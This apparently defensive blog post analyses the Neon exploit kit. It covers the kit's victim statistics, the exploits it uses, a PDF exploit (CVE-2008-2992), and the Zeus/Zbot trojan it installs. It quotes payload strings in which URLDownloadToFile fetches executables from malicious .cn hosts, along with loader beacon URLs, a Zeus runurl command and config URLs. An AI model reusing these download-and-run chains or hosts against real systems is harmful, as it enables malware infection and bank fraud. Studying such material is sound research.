Perpetual Horizon: Poking at the Neon exploit kit

I recently noticed the Neon exploit kit being mentioned at malwaredomainlist.com. Some basic googling returned some research, but not much. My www.malwaredomainlist.com query returned the following:

Only two NEON exploit kits were specifically listed at malwaredomains.com. The other was:

Specifically you can see that the first site, tomorrrrow.cn uses the directory /difpack and the second site sirius.mn uses the directory /tuc. Some other google queries for /difpack didn't result in anything signifcant so there is probably a site-specific value being used here I'm thinking. The only file in common was stat.php.

Screenshots were easy to obtain from the statistics page of the .cn site. The first page reveals browsers; some of these are likely to be researchers but most are probably victims. IE6 hit hardest (what a surprise)

Next up were operating system stats. XP of course was the largest. I was a bit surprised at Windows 2003 appearing as much as it did. I guess people are still surfing the web from their servers despite being warned against doing this since 1950. I haven't seen the back-end code but I'm guessing that "Loads" means an actual exploit is loaded, or is successfully executed (need to see the kit itself to understand how this is calcuated; any researcher got the kit source? drop me a line please if so)

Countries - USA is the largest target/victim

Next up were the referers - I didn't check these sites but the stats show an infection trail (or in some cases, obvious security/malware researchers poking about as you got further down the list). The actual URL's were not included here, so it's hard to know where in a site a redirect, IFRAME or other trickery is placed. In the case of the top referer, www.bearmarketcentral.com, I see that they have a forum and this seems like a likely location for trouble. Also troubling are several references to Grant Morrison, a fabulous comics creator.

Next up are the actual exploits used. Nothing too exciting here. All of these have been documented elsewhere at length so I won't go into much detail, but one can see a typical array of Adobe Reader exploits, the older Microsoft MDAC bug, an IE 7 exploit and the Snapshot viewer exploit. Despite MDAC being such an old bug, if Loads or Efficiency represents actual exploitation, it's higher than it should be and is just another indication of unskilled computer users who are unfortunately easy prey.

An entry page to the site contains the common technique of offering obfuscated Javascript.

This javascipt was not able to be deobfuscated by Wepawet's sandbox for unknown reasons, and initial attempts at decoding in Malzilla also failed. I'm sure I can decode it if I spent a little bit of time on it. It probably just points the users to the various pages serving the actual exploit code.

Later analysis with Wepawet reveals one of these pages, serving the Acrobat Reader stack overflow/format string in util.printf PDF exploit (CVE-2008-2992) - (see http://wepawet.cs.ucsb.edu/view.php?hash=3cbe658f62c9324793b132178717e81a&t=1261673543&type=js for the full report)

http:// tomorrrrow.cn /difpack/cache/readme.pdf

The PDF exploit contains two payloads, both downloaded with the URLDownloadToFile function (I'm unsure what the string crash.php is doing) to the destination file pdfupd.exe. The first payload is targeted at http:// souzmov.cn /difpack/load.php?id=4,

URLDownloadToFil
eA.pdfupd.exe.cr
ash.php.http://s
ouzmov.cn/difpac
k/load.php?id=4

and the second payload targeted at http:// souzmov.cn /difpack/load.php?id=5

URLDownloadToFil
eA.pdfupd.exe.cr
ash.php.http://s
ouzmov.cn/difpac
k/load.php?id=5

The homepage of the site contains a typical placeholder page that I have seen associated with Russian Business Network (RBN) sites in the past. It may just be a typical entry page from some specific CMS, but I've seen the four-color image often enough on malware sites to raise a red flag.

Very good static AV coverage on page delivered via load.php (pushes load.exe)
37/41 (90.24%), findings included mostly the Sasfis trojan.

http://www.virustotal.com/analisis/31ca8b8422659f967627f4dd8c0f0b627509f1ada132159733d016edc7c97bfd-1261808607

http://www.threatexpert.com/report.aspx?md5=056346161d867c0944b4e15ec5bdda9c

The malware also is involved in Zeus installations; installation of load.exe performs the following:

The following HTTP URLs were started reading:
http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=1&b=svyazka
http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=2&b=svyazka
http://tomorrrrow.cn/loader/bb.php?id=&v=200&tm=3&b=svyazka

Command data is apparently delivered via bb.php as such:

[info]runurl:http://spysystemcom.cn/gamedata2/game.exe|taskid:6|delay:20|upd:0|backurls:http://yesandns.cn/loader/[/info]

game.exe contains Zeus/Zbot. The "backurls" url did not resolve.

The ThreatExpert report for Zeus (game.exe) has new (to me) functionality that apparently parses the list of target domains that is normally contained in the zeus config file (cfg.bin is a filename I've often seen). This is a nice feature that's a time saver in an incident response situation.

Check out the useful and informativeThreatExpert report which includes a list of the targeted financial institutions - a very nice addition to ThreatExpert that I don't recall seeing before.

http://www.threatexpert.com/report.aspx?md5=1f22afba0880113d30ac80fef64eac1e

MD5 = 0x01605D291B427C8564E7E13CDEEA1AE9

The first five financial institutions are listed as such:

    * https://www.gruposantander.es
    * http://*odnoklassniki.ru
    * http://vkontakte.ru
    * https://banking.*.de
    * https://internetbanking.gad.de
    * https://www.citibank.de

I found it interesting that a mutex named _AVIRA_21099 was created. This may be documented in other much more deep analysis but I don't recall.

The Zeus/Zbot config file is obtained from http://spysystemcom.cn/gamedata2/res.bin

Trying to reverse engineer this malware, even dynamic analysis, would take me far longer than what ThreatExpert offers. Sure, sandboxes have been evaded and are not perfect, but what a huge time-saver. I offer my thanks to the creators and maintainers of Wepawet, ThreatExpert, Anubis, VirusTotal and other sandoxes.